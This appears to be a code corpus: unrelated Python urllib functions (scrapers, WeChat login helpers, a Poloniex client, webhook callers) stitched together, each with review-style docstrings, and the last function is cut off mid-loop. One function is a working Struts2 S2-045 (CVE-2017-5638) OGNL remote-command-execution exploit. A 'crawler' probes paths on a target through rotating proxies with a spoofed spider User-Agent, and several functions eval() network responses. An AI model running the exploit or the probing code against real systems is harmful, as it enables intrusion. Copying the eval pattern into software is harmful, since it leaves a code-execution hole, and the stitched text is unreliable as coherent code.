def download(book):
    """Download a book from libgen to the current directory.

    :param book: dict with 'title', 'extension' and 'hash' (md5) keys;
                 the download URL is ``downloadurl + book['hash']``
                 (``downloadurl`` is a module-level constant).
    """
    import urllib.request

    blocksize = 1024  # bytes fetched per read
    filename = book['title'] + '.' + book['extension']
    bookurl = downloadurl + book['hash']
    req = urllib.request.Request(bookurl)
    # Stream the response to disk chunk by chunk so a large book never
    # has to fit in memory.  (The original multiprocessing range-request
    # scheme was dead code behind an unconditional `return` and relied on
    # the undefined name `byte` and py2-only itertools.izip.)
    with urllib.request.urlopen(req) as resp, open(filename, 'wb') as f:
        while True:
            chunk = resp.read(blocksize)
            if not chunk:
                break
            f.write(chunk)
def fetion(msg):
    """Log in to the Fetion web gateway and send *msg* to oneself as an SMS.

    Relies on the module-level credentials ``user``/``password``/``loginstatus``
    and the endpoints ``url_login``/``url_msg``/``url_logout``.

    :param msg: message text as GBK-encoded bytes (it is re-encoded to UTF-8)
    """
    import http.cookiejar
    import urllib.parse
    import urllib.request

    cj = http.cookiejar.LWPCookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    urllib.request.install_opener(opener)
    args = {'pass': password, 'm': user, 'loginstatus': loginstatus}
    print('Logining...')
    req = urllib.request.Request(url_login,
                                 urllib.parse.urlencode(args).encode('utf-8'))
    jump = opener.open(req)
    # decode so the str regexes below can match; TODO confirm site charset
    # (the original source file was GBK-encoded)
    page = jump.read().decode('utf-8', 'replace')
    # extract the redirect target of the post-login jump page
    url = re.compile(r'<card id="start".*?ontimer="(.*?);').findall(page)[0]
    arg_t = re.compile(r't=(\d*)').findall(page)[0]
    if url == '/im/login/login.action':  # login failed
        print('Login Failed!')
        input('Press any key to exit.')
        return
    else:
        print('Login Successfully!')
    sendmsg = urllib.request.Request(
        url_msg,
        urllib.parse.urlencode(
            {'msg': msg.decode('gbk').encode('utf-8')}).encode('utf-8'))
    finish = urllib.request.urlopen(sendmsg)
    # geturl is a method: the original compared the bound method object
    # itself, so the failure branch could never trigger.
    if finish.geturl() == 'http://f.10086.cn/im/user/sendMsgToMyself.action':
        print('Send Failed!')
    else:
        print('Send Successfully')
    logout = urllib.request.Request(url_logout + arg_t)
    response = urllib.request.urlopen(logout)  # log out
    print('Logout Successfully!')
def api_query(self, command, req=None):
    """Query the Poloniex API.

    Public market-data commands go to the public endpoint; anything else
    is HMAC-SHA512-signed with the account secret and POSTed to the
    trading endpoint.

    :param command: API command name
    :param req: optional extra parameters (e.g. ``currencyPair``)
    :return: decoded JSON; trading calls pass through ``self.post_process``
    """
    # The original used a mutable default `req={}` and then mutated it,
    # leaking command/nonce between calls.
    if req is None:
        req = {}
    if command in ("returnTicker", "return24Volume"):
        ret = urllib.request.urlopen(
            'https://poloniex.com/public?command=' + command)
        return json.loads(ret.read())
    elif command == "returnOrderBook":
        ret = urllib.request.urlopen(urllib.request.Request(
            'https://poloniex.com/public?command=' + command +
            '&currencyPair=' + str(req['currencyPair'])))
        return json.loads(ret.read())
    elif command == "returnMarketTradeHistory":
        ret = urllib.request.urlopen(urllib.request.Request(
            'https://poloniex.com/public?command=' + "returnTradeHistory" +
            '&currencyPair=' + str(req['currencyPair'])))
        return json.loads(ret.read())
    else:
        req['command'] = command
        req['nonce'] = int(time.time() * 1000)
        post_data = urllib.parse.urlencode(req).encode('utf-8')
        # signature over the urlencoded body, as the trading API requires
        sign = hmac.new(self.Secret, post_data, hashlib.sha512).hexdigest()
        headers = {'Sign': sign, 'Key': self.APIKey}
        ret = urllib.request.urlopen(urllib.request.Request(
            'https://poloniex.com/tradingApi', post_data, headers))
        jsonRet = json.loads(ret.read())
        return self.post_process(jsonRet)
def getHtmlText(self, is_cookie=False):
    """Fetch ``self.url_path`` and return the raw response body.

    The request is built from ``self.post_data`` and ``self.header``:
    plain GET when both are empty, GET with headers when only headers are
    set, POST otherwise.

    :param is_cookie: when True, additionally open the request through
                      ``self.opener`` so its cookie jar is populated.
    :return: response body (bytes, as returned by ``read()``)
    """
    if self.post_data is None and self.header == {}:
        request = urllib.request.Request(self.url_path)
    elif self.post_data is None:
        # The original immediately overwrote this request with a plain
        # urlopen of the URL, silently dropping the custom headers.
        request = urllib.request.Request(self.url_path, headers=self.header)
    else:
        request = urllib.request.Request(
            self.url_path,
            urllib.parse.urlencode(self.post_data).encode('utf-8'),
            self.header)
    result = urllib.request.urlopen(request)
    if is_cookie:
        self.operate = self.opener.open(request)
    resText = result.read()
    return resText
def GetDownload(self, url1, imgurl):
    """Download the resource at *url1* and save it to the path *imgurl*.

    Robot Framework keyword; sends a browser User-Agent so the server
    does not reject the request.

    Example:
    | *Keywords*    |                      |           |
    | get down load | http://www.baidu.com | c:\\a.jpg |
    """
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36'
    }
    request = urllib.request.Request(url1, headers=headers)
    response = urllib.request.urlopen(request)
    # write the raw bytes; the file handle is closed by the with-block
    with open(imgurl, "wb") as f:
        f.write(response.read())
def process_item(self, item, spider):
    """Scrapy pipeline step: save the page behind ``item['url']`` locally.

    Downloads only when the target file does not already exist, patching
    the declared charset from gb2312 to utf-8 before writing.

    :return: the item unchanged, per pipeline convention
    """
    print('test2')
    file_name = os.path.join(u'', os.getcwd(), 'cbrc', settings.BaseDir,
                             str(item['level']),
                             item['urltitle'].strip() + '.html')
    htmltext = ""
    print(file_name)
    if not self.checkfileExists(file_name):
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'
        }
        req = urllib.request.Request(url=item['url'], headers=headers)
        res = urllib.request.urlopen(req)
        htmltext = res.read()
        # read() returns bytes, so the charset patch must use bytes too;
        # the original passed str arguments, which raises TypeError.
        htmltext = htmltext.replace(b'charset=gb2312', b'charset=utf-8')
        with open(file_name, 'wb') as fp:
            fp.write(htmltext)
        print(u"保存文件:" + file_name)
    else:
        # with-block closes the handle the original leaked
        with open(file_name, 'r') as f:
            htmltext = f.read()
    return item
def get_device_type(self, device_name):
    """Return a device's type by name: "HPCC", "FC" or "unknown".

    Tries the local mongo collection first; on any failure falls back to
    querying the RCMS API.

    :param device_name: device hostname
    :return: "HPCC", "FC" or "unknown"
    """
    try:
        dd = self.collection["device_app"].find_one({"name": device_name})
        return dd["type"]
    except Exception as e:
        # the original logged the unbound name `e` (NameError) — bind it
        logger.error(e)
    if not device_name or device_name == 'null':
        return 'unknown'
    get_url = RCMS_API.format(device_name)
    req = urllib.request.Request(get_url, headers=send_headers)
    # NOTE(review): eval() on a network response executes arbitrary code if
    # the endpoint is compromised — json.loads would be safer; kept to
    # preserve behavior.
    got_list = eval(urllib.request.urlopen(req, timeout=100).read())
    try:
        got_list = got_list.get('data')
        device_type = [
            dic['appName'] for dic in got_list
            if dic['appName'] in ['FC', 'HPCC']
        ][0]
    except Exception:
        logger.error(traceback.format_exc())
        device_type = 'unknown'
    return device_type
def parse(diff):
    """Scrape the zasa.sakura.ne.jp DP ranking table for difficulty *diff*.

    :param diff: value for the form's ``offi`` field
    :return: list of (group_title, [(song_title, diff_label), ...]) tuples
    """
    formdata = {
        'env': 'a230',
        'submit': '%E8%A1%A8%E7%A4%BA',  # u'表示' ("show")
        'cat': 0,
        'mode': 'p1',
        'offi': diff,
    }
    # POST bodies must be bytes in Python 3
    formdata_raw = urllib.parse.urlencode(formdata).encode('ascii')
    req = urllib.request.Request("http://zasa.sakura.ne.jp/dp/rank.php",
                                 formdata_raw)
    data = urllib.request.urlopen(req).read()
    soup = BeautifulSoup(data, "lxml")  # explicit parser silences warning
    res = []  # [(group, [(song, diff_label), ..]), ..]
    table = soup.find('table', class_="rank_p1")
    trs = table.find_all('tr')
    group_title = ''
    for tr in trs[1:-1]:
        # first column carries the difficulty-group label
        group_title = tr.find_all('td')[0].get_text()
        for sp in tr.find_all('span'):
            sp_text = sp.get_text()
            title = sp_text[:-4]
            # renamed from `diff` — the original shadowed its own parameter
            diff_label = "DP" + sp['class'][0].upper()
            if diff_label == "DPL":
                diff_label = "DPA"
                title += " (L)"
            group = getGroup(res, group_title)
            group[1].append((title, diff_label))
    return res
def main():
    """Download an English subtitle for the movie at argv[1] from SubDB.

    Saves the subtitle next to the movie file with a ``.srt`` extension.
    """
    userAgent = 'SubDB1.0 (seema1711/0.1; https://github.com/seema1711/subtitle-downloader)'
    moviePath = sys.argv[1]
    movieName = os.path.join(os.getcwd(), moviePath)
    content = {
        'action': 'download',
        'hash': get_hash(movieName),  # SubDB content hash of the movie
        'language': 'en',
    }
    url = 'http://api.thesubdb.com/?' + urllib.parse.urlencode(content)
    request = urllib.request.Request(url)
    request.add_header('User-Agent', userAgent)  # API requires a custom UA
    response = urllib.request.urlopen(request)
    subtitles = response.read()
    index = movieName.rfind('.')
    fileName = movieName[0:index] + '.srt'
    # read() yields bytes, so the file must be opened in binary mode
    # (the original 'w' text mode raises TypeError)
    with open(fileName, 'wb') as f:
        f.write(subtitles)
    print("Subtitle Downloaded!!")
def crawler():
    """Probe queued paths against ``domain_name`` through random proxies.

    Pops paths from the module-level queue ``q`` until it is empty and
    prints the status code for every path that returns a non-empty body.
    """
    import urllib.error
    while not q.empty():
        path = q.get()  # take one candidate path off the queue
        url = "%s%s" % (domain_name, path)
        random_proxy = random.choice(proxy_list)  # rotate proxy per request
        proxy_support = urllib.request.ProxyHandler(random_proxy)
        opener = urllib.request.build_opener(proxy_support)
        urllib.request.install_opener(opener)
        headers = {}
        headers['User-Agent'] = Baidu_spider  # spoof a spider User-Agent
        request = urllib.request.Request(url, headers=headers)
        try:
            response = urllib.request.urlopen(request)
            content = response.read()
            if len(content):
                # non-empty body: report status code and path
                print("Status [%s] - path: %s" % (response.code, path))
            response.close()
            time.sleep(1)  # throttle so the IP does not get banned
        except urllib.error.HTTPError:
            # deliberately ignore HTTP errors (404 etc.) and keep probing
            pass
def trigger_url(url):
    """POST the current date and time as JSON to a webhook *url*.

    :return: raw response body (bytes)
    """
    data = '{ "value1" : "' + time.strftime("%Y-%m-%d") + \
           '", "value2" : "' + time.strftime("%H:%M") + '" }'
    # the request body must be bytes in Python 3
    req = urllib.request.Request(url, data.encode('utf-8'),
                                 {'Content-Type': 'application/json'})
    f = urllib.request.urlopen(req)
    try:
        return f.read()
    finally:
        f.close()  # close even if read() raises
def download_page(url):
    """Fetch *url* with a browser User-Agent, on either Python 2 or 3.

    :return: page content on success; on Python 3 failures the exception is
             printed and None is returned, on Python 2 failures the string
             "Page Not found" is returned.
    """
    version = (3, 0)
    cur_version = sys.version_info
    if cur_version >= version:
        # Python 3.x path
        import urllib.request
        try:
            headers = {}
            headers[
                'User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
            req = urllib.request.Request(url, headers=headers)
            resp = urllib.request.urlopen(req)
            # NOTE(review): str() of bytes yields "b'...'"; callers appear
            # to accept this, so kept — decode() would be the cleaner fix.
            respData = str(resp.read())
            return respData
        except Exception as e:
            print(str(e))
    else:
        # Python 2.x path (flat urllib API)
        import urllib
        try:
            headers = {}
            headers[
                'User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
            req = urllib.Request(url, headers=headers)
            response = urllib.urlopen(req)
            page = response.read()
            return page
        except Exception:
            # narrowed from a bare except:, which also swallowed
            # KeyboardInterrupt/SystemExit
            return "Page Not found"
def GetCoverPage(self, url, title):
    """Walk the paginated cover listing at *url* looking for an image whose
    alt text matches *title*.

    :param url: listing base URL; pages are fetched as ``url + "/" + page``
    :param title: title to match (substring comparison in either direction)
    :return: the matching image's ``src``, or None when pages run out
    """
    Log("Getting cover page")
    Log(title)
    Log(url)
    page = 1
    while True:
        try:
            accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
            if 'http' in url:
                u = url + "/" + str(page)
                Log(u)
                req = urllib.request.Request(u)
                req.add_header('Accept', accept)
                resp = urllib.request.urlopen(req)
                ele = HTML.ElementFromString(resp.read())
                # an <h2> on the page marks the end of the listing
                test = ele.xpath('//h2')
                if len(test) == 0:
                    scenes = ele.xpath(
                        '//div[contains(@class,"cover-wrap")]//img')
                    for s in scenes:
                        alt = s.get('alt').lower()
                        if alt != '':
                            Log("alt = " + alt)
                            if (alt in title) or (title in alt):
                                return s.get('src')
            else:
                break
            page = page + 1
        except Exception:
            # narrowed from a bare except:; any fetch/parse error ends the walk
            Log("Got to page: " + str(page))
            break
def get_content(self):
    """Scrape qiushibaike stories for every URL queued in redis.

    Pops URLs from the ``job_redis`` ``urls`` set until it is empty and
    collects text-only stories (posts containing images are skipped).

    :return: list of plain-text stories
    """
    import urllib.error
    stories = []
    # group 1: story body; group 2: trailing markup used to detect images
    content_pattern = re.compile(
        r'<div class="content">([\w\W]*?)</div>([\w\W]*?)class="stats"')
    tag_pattern = re.compile(r'<.*?>')  # strips residual HTML tags
    url = job_redis.spop('urls')
    while url:
        text = ''  # keep defined when the fetch below fails
        try:
            request = urllib.request.Request(url, headers=headers)
            response = urllib.request.urlopen(request)
            # decode: the str regexes above cannot match on bytes
            text = response.read().decode('utf-8', 'replace')
        except urllib.error.URLError as e:
            if hasattr(e, "reason"):
                print(e.reason)
        content = re.findall(content_pattern, text)
        for x in content:
            if "img" not in x[1]:  # drop stories that contain an image
                x = re.sub(tag_pattern, '', x[0])
                x = re.sub('\n', '', x)
                stories.append(x)
        url = job_redis.spop('urls')
        time.sleep(3)  # be polite to the site
    return stories
def rpc(method, params):
    """Issue a JSON-RPC 1.0 call to a daemon on localhost.

    Credentials come from argv[1]/argv[2]; an optional argv[3] overrides
    the default port 28280.

    :param method: RPC method name
    :param params: RPC parameter list
    :return: decoded JSON response
    """
    data = {
        "jsonrpc": "1.0",
        "id": "curltest",
        "method": method,
        "params": params
    }
    data_json = dumps(data)
    username = argv[1]
    password = argv[2]
    port = 28280
    if len(argv) > 3:
        port = argv[3]
    url = "http://127.0.0.1:{}/".format(port)
    # request body must be bytes in Python 3
    req = urllib.request.Request(url, data_json.encode('utf-8'),
                                 {'content-type': 'application/json'})
    # base64.encodestring was removed in Python 3.9; b64encode inserts no
    # newlines, so the old .replace('\n', '') is unnecessary
    auth = base64.b64encode(
        '{}:{}'.format(username, password).encode('utf-8')).decode('ascii')
    req.add_header("Authorization", "Basic %s" % auth)
    response_stream = urllib.request.urlopen(req)
    json_response = response_stream.read()
    return loads(json_response)
def showQRImage():
    """Fetch the WeChat login QR code for the current ``uuid``, save it to
    ``QRImagePath`` and open it with the platform's image viewer."""
    global tip
    url = 'https://login.weixin.qq.com/qrcode/' + uuid
    params = {
        't': 'webwx',
        '_': int(time.time()),  # cache-busting timestamp
    }
    # body must be bytes in Python 3
    request = urllib.request.Request(
        url=url, data=urllib.parse.urlencode(params).encode('utf-8'))
    response = urllib.request.urlopen(request)
    tip = 1
    with open(QRImagePath, 'wb') as f:
        f.write(response.read())
    # open the image with whatever viewer the platform provides
    if sys.platform.find('darwin') >= 0:
        os.system('open %s' % QRImagePath)
    elif sys.platform.find('linux') >= 0:
        os.system('xdg-open %s' % QRImagePath)
    else:
        os.system('call %s' % QRImagePath)
    print('请使用微信扫描二维码以登录')
def waitForLogin():
    """Poll the WeChat login endpoint once and react to the status code.

    Updates the module-level ``tip``/``base_uri``/``redirect_uri`` as the
    login progresses.

    :return: the status code string ('201' scanned, '200' logged in,
             '408' timed out)
    """
    global tip, base_uri, redirect_uri
    url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
        tip, uuid, int(time.time()))
    request = urllib.request.Request(url=url)
    response = urllib.request.urlopen(request)
    # decode so the str regexes below can match (read() returns bytes)
    data = response.read().decode('utf-8', 'replace')
    # response looks like: window.code=500;
    regx = r'window.code=(\d+);'
    pm = re.search(regx, data)
    code = pm.group(1)
    if code == '201':  # QR code scanned on the phone
        print('成功扫描,请在手机上点击确认以登录')
        tip = 0
    elif code == '200':  # confirmed: extract the redirect for the next step
        print('正在登录...')
        regx = r'window.redirect_uri="(\S+?)";'
        pm = re.search(regx, data)
        redirect_uri = pm.group(1) + '&fun=new'
        base_uri = redirect_uri[:redirect_uri.rfind('/')]
    elif code == '408':  # poll timed out; caller will retry
        pass
    return code
def get_page(url, pn, keyword):
    """POST a lagou.com job-search query and return the page body as text.

    :param url: endpoint URL
    :param pn: page number (1-based)
    :param keyword: search keyword
    :return: response body decoded as UTF-8
    """
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)'
        'Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3',
        'Host': 'www.lagou.com',
        'Connection': 'keep-alive',
        'Origin': 'http://www.lagou.com'
    }
    if pn == 1:
        boo = 'true'
    else:
        boo = 'false'
    # urlencode the form fields; the original called
    # urllib.request.urlopen()(...) here, which is a TypeError.
    # NOTE(review): `boo` is computed but unused — it looks like it was
    # meant to be a 'first' field in this form; confirm against the API.
    page_data = urllib.parse.urlencode([('url', url), ('pn', pn),
                                        ('kd', keyword)])
    req = urllib.request.Request(url, headers=headers)
    page = urllib.request.urlopen(req, data=page_data.encode('utf-8')).read()
    page = page.decode('utf-8')
    return page
def submit(fmserver, infotype, trackartist, tracktitle, sessionkey):
    """Submit a love/unlove/ban/unban event to a libre.fm-style server.

    :param fmserver: server base URL (the '/2.0/' API path is appended)
    :param infotype: one of 'loved', 'unloved', 'banned', 'unbanned'
    :return: True when the server answers status "ok"; False on a parse
             error; None (falsy) on any other status
    """
    if infotype == 'loved':
        libremethod = 'track.love'
    elif infotype == 'unloved':
        libremethod = 'track.unlove'
    elif infotype == 'banned':
        libremethod = 'track.ban'
    elif infotype == 'unbanned':
        libremethod = 'track.unban'
    else:
        sys.exit('invalid method')
    postdata = dict(method=libremethod,
                    artist=trackartist,
                    track=tracktitle,
                    sk=sessionkey,
                    format='json')
    # POST body must be bytes in Python 3
    req = urllib.request.Request(
        fmserver + '/2.0/',
        urllib.parse.urlencode(postdata).encode('utf-8'))
    response = urllib.request.urlopen(req)
    try:
        jsonresponse = json.load(response)
        status = jsonresponse['lfm']['status']
        if status == "ok":
            return True
    except Exception:
        # narrowed from a bare except:; malformed response counts as failure
        return False
def exploit(self, url, cmd):
    '''
    Execute an arbitrary command on a host vulnerable to Struts2 S2-045
    (CVE-2017-5638), via an OGNL payload in the Content-Type header.

    :param url: target URL
    :param cmd: command to execute
    :return: the response page content (command output)
    '''
    # OGNL injection payload delivered through the Content-Type header
    payload = "%{(#_='multipart/form-data')."
    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"
    try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib.request.Request(url, headers=headers)
        page = urllib.request.urlopen(request).read()
    except http.client.IncompleteRead as e:
        # the server may cut the stream short; keep whatever arrived
        page = e.partial
    print(page)
    return page
def get_devices_type(self, devices):
    """Map each device name to its type, e.g. {dev1: 'HPCC', dev2: 'FC'}.

    For each device the local mongo collection is tried first, with the
    RCMS API as fallback; unresolvable devices map to 'unknown'.
    (Currently unused, per the original note.)

    :param devices: iterable of device names
    :return: dict of device name -> type
    """
    devices_type = {}
    for dev in devices:
        try:
            dd = self.collection["device_app"].find_one({"name": dev})
            devices_type[dev] = dd["type"]
        except Exception as e:
            # the original referenced an unbound `e` here (NameError)
            print(e)
            logger.error(e)
            get_url = RCMS_API.format(dev)
            req = urllib.request.Request(get_url, headers=send_headers)
            # NOTE(review): eval() of a network response is dangerous —
            # json.loads would be safer; kept to preserve behavior.
            got_list = eval(
                urllib.request.urlopen(req, timeout=100).read())
            try:
                got_list = got_list.get('data')
                devices_type[dev] = [
                    dic['appName'] for dic in got_list
                    if dic['appName'] in ['FC', 'HPCC']
                ][0]
            except Exception:
                logger.error(traceback.format_exc())
                devices_type[dev] = 'unknown'
    return devices_type
def webwxinit():
    """Initialize the WeChat web session.

    Populates the module-level ``ContactList`` and ``My`` from the
    webwxinit response.

    :return: True on success, False when the response Ret code is non-zero
    """
    url = base_uri + '/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
        pass_ticket, skey, int(time.time()))
    params = {'BaseRequest': BaseRequest}
    # JSON body must be bytes in Python 3
    request = urllib.request.Request(url=url,
                                     data=json.dumps(params).encode('utf-8'))
    request.add_header('ContentType', 'application/json; charset=UTF-8')
    response = urllib.request.urlopen(request)
    data = response.read()
    if DEBUG:
        # dump the raw response for offline inspection
        with open(os.getcwd() + '/webwxinit.json', 'wb') as f:
            f.write(data)
    global ContactList, My
    dic = json.loads(data)
    ContactList = dic['ContactList']
    My = dic['User']
    ErrMsg = dic['BaseResponse']['ErrMsg']
    if len(ErrMsg) > 0:
        print(ErrMsg)
    Ret = dic['BaseResponse']['Ret']
    if Ret != 0:
        return False
    return True
def write_devices_failed_top(data):
    """Render the top-10 failing devices as an HTML table.

    :param data: dict whose ``data`` value maps to per-device stat dicts
                 (hostname, ISP, type, firstLayer, per-status counts)
    :return: HTML table string
    """
    theader = '<th>NO.</th><th>hostname</th><th>ISP</th><th>type</th><th>firstLayer</th><th>500</th><th>501</th><th>502</th><th>503</th><th>FAIL</th><th>mrtg</th>'
    trs = []
    mrtg = ""
    for i, device in enumerate(list(data['data'].values())[:10]):
        try:
            dev = conn.device_app.find_one({"name": device['hostname']})
            url = HOPE_MRTG.format(dev["devCode"])
            logger.debug("write_devices_failed_top url: %s" % (url, ))
            req = urllib.request.Request(url, headers=send_headers)
            # NOTE(review): eval() of a network response is dangerous —
            # json.loads would be safer; kept to preserve behavior.
            mrtg_info = eval(urllib.request.urlopen(req, timeout=100).read())
            mrtg = ','.join(mrtg_info['data']['mrtgs'])
        except Exception:
            # on failure the previous row's mrtg value is reused
            logger.error(traceback.format_exc())
        tr = [
            str(i + 1), device['hostname'], device['ISP'], device['type'],
            str(device['firstLayer']),
            str(device.get('500', 0)),
            str(device.get('501', 0)),
            str(device.get('502', 0)),
            str(device.get('503', 0)),
            str(device.get('failed_total', 0)), mrtg
        ]
        trs.append('<td>{0}</td>'.format('</td><td>'.join(tr)))
    table = '<table border="1">\n<thead><tr>{0}</tr></thead>\n<tbody>\n<tr>{1}</tr></tbody></table>'.format(
        theader, '</tr>\n<tr>'.join(trs))
    return table
def createChatroom(UserNames):
    """Create a WeChat group chat containing the given users.

    :param UserNames: iterable of member UserName strings
    :return: (ChatRoomName, DeletedList) — the new room's name and the
             members whose status shows they deleted the current account
    """
    MemberList = [{'UserName': UserName} for UserName in UserNames]
    url = base_uri + '/webwxcreatechatroom?pass_ticket=%s&r=%s' % (
        pass_ticket, int(time.time()))
    params = {
        'BaseRequest': BaseRequest,
        'MemberCount': len(MemberList),
        'MemberList': MemberList,
        'Topic': '',
    }
    # JSON body must be bytes in Python 3
    request = urllib.request.Request(url=url,
                                     data=json.dumps(params).encode('utf-8'))
    request.add_header('ContentType', 'application/json; charset=UTF-8')
    response = urllib.request.urlopen(request)
    data = response.read()
    dic = json.loads(data)
    ChatRoomName = dic['ChatRoomName']
    MemberList = dic['MemberList']
    DeletedList = []
    for Member in MemberList:
        if Member['MemberStatus'] == 4:  # status 4: deleted by the other side
            DeletedList.append(Member['UserName'])
    ErrMsg = dic['BaseResponse']['ErrMsg']
    if len(ErrMsg) > 0:
        print(ErrMsg)
    return (ChatRoomName, DeletedList)
def auth_as_app(self) -> dict:
    """Obtain an OAuth client-credentials token for the app.

    Stores the parsed token response on the instance (``full_response``,
    ``jwt``, ``expires_in_secs``, ``expiry_time``).

    :return: the full decoded token response (a dict — the original
             ``-> str`` annotation contradicted the actual return value)
    :raises UnauthorizedRequestError: when the token endpoint rejects us
    """
    logger.info("Getting access token for app")
    self.request_time = datetime.datetime.now()
    data = {'grant_type': 'client_credentials'}
    pw_manager = urllib.request.HTTPPasswordMgrWithDefaultRealm()
    pw_manager.add_password(None, constants.OAUTH_URL, self.app_id,
                            self.app_secret)
    urllib.request.install_opener(
        urllib.request.build_opener(
            urllib.request.HTTPBasicAuthHandler(pw_manager)))
    # a dict cannot be passed raw as data=; it must be urlencoded bytes
    request = urllib.request.Request(
        constants.OAUTH_URL,
        data=urllib.parse.urlencode(data).encode('utf-8'),
        headers=constants.OAUTH_REQUEST_HEADERS)
    try:
        with urllib.request.urlopen(request) as response:
            self.full_response = json.loads(response.read())
            self.jwt = self.full_response["access_token"]
            self.expires_in_secs = datetime.timedelta(
                seconds=self.full_response["expires_in"])
            # refresh slightly before the true expiry to avoid races
            self.expiry_time = self.request_time + self.expires_in_secs - constants.JWT_TOKEN_REFRESH_BUFFER
            logger.log(
                5,
                "refreshed auth token at %s - token will expire in %s, with a buffer next refresh will be at %s",
                self.request_time, self.expires_in_secs, self.expiry_time)
            return self.full_response
    except urllib.error.HTTPError as err:
        logger.critical(
            "Tried to authenticate an app, got error code %s with reason %s",
            err.code, err.reason)
        raise UnauthorizedRequestError()
def deleteMember(ChatRoomName, UserNames):
    """Remove members from a WeChat group chat.

    :param ChatRoomName: target room identifier
    :param UserNames: iterable of member UserName strings to remove
    :return: True on success, False when the response Ret code is non-zero
    """
    url = base_uri + '/webwxupdatechatroom?fun=delmember&pass_ticket=%s' % (
        pass_ticket)
    params = {
        'BaseRequest': BaseRequest,
        'ChatRoomName': ChatRoomName,
        'DelMemberList': ','.join(UserNames),
    }
    # JSON body must be bytes in Python 3
    request = urllib.request.Request(url=url,
                                     data=json.dumps(params).encode('utf-8'))
    request.add_header('ContentType', 'application/json; charset=UTF-8')
    response = urllib.request.urlopen(request)
    data = response.read()
    dic = json.loads(data)
    ErrMsg = dic['BaseResponse']['ErrMsg']
    if len(ErrMsg) > 0:
        print(ErrMsg)
    Ret = dic['BaseResponse']['Ret']
    if Ret != 0:
        return False
    return True
def addMember(ChatRoomName, UserNames):
    """Add members to a WeChat group chat.

    :param ChatRoomName: target room identifier
    :param UserNames: iterable of member UserName strings to add
    :return: list of members whose status shows they deleted this account
    """
    url = base_uri + '/webwxupdatechatroom?fun=addmember&pass_ticket=%s' % (
        pass_ticket)
    params = {
        'BaseRequest': BaseRequest,
        'ChatRoomName': ChatRoomName,
        'AddMemberList': ','.join(UserNames),
    }
    # JSON body must be bytes in Python 3
    request = urllib.request.Request(url=url,
                                     data=json.dumps(params).encode('utf-8'))
    request.add_header('ContentType', 'application/json; charset=UTF-8')
    response = urllib.request.urlopen(request)
    data = response.read()
    dic = json.loads(data)
    MemberList = dic['MemberList']
    DeletedList = []
    for Member in MemberList:
        if Member['MemberStatus'] == 4:  # status 4: deleted by the other side
            DeletedList.append(Member['UserName'])
    ErrMsg = dic['BaseResponse']['ErrMsg']
    if len(ErrMsg) > 0:
        print(ErrMsg)
    return DeletedList
def getUUID():
    """Request a fresh WeChat login uuid and store it in the module-level
    ``uuid``.

    :return: True when the endpoint answers code 200, False otherwise
    """
    global uuid
    url = 'https://login.weixin.qq.com/jslogin'
    params = {
        'appid': 'wx782c26e4c19acffb',  # fixed web-WeChat app id
        'fun': 'new',
        'lang': 'zh_CN',
        '_': int(time.time()),  # cache-busting timestamp
    }
    # body must be bytes in Python 3
    request = urllib.request.Request(
        url=url, data=urllib.parse.urlencode(params).encode('utf-8'))
    response = urllib.request.urlopen(request)
    # decode so the str regex below can match (read() returns bytes)
    data = response.read().decode('utf-8', 'replace')
    # response looks like:
    # window.QRLogin.code = 200; window.QRLogin.uuid = "oZwt_bFfRg==";
    regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
    pm = re.search(regx, data)
    code = pm.group(1)
    uuid = pm.group(2)
    if code == '200':
        return True
    return False
def LoadPageContent(self, page):
    """Scrape one page of the Taobao model ranking list and fetch the
    detail page of every model found.

    :param page: page number to load
    """
    # record the start time so detail-page fetches can be timed
    begin_time = datetime.datetime.now()
    url = "https://mm.taobao.com/json/request_top_list.htm?page=" + str(
        page)
    self.page += 1
    USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36'
    headers = {'User-Agent': USER_AGENT}
    request = urllib.request.Request(url, headers=headers)
    response = urllib.request.urlopen(request)
    # groups: avatar, profile url, name, age, location
    pattern_link = re.compile(
        r'<div.*?class="pic-word">.*?<img src="(.*?)".*?'
        r'<a.*?class="lady-name".*?href="(.*?)".*?>(.*?)</a>.*?'
        r'<em>.*?<strong>(.*?)</strong>.*?'
        r'<span>(.*?)</span>', re.S)
    items = re.findall(pattern_link, response.read().decode('gbk'))
    for item in items:
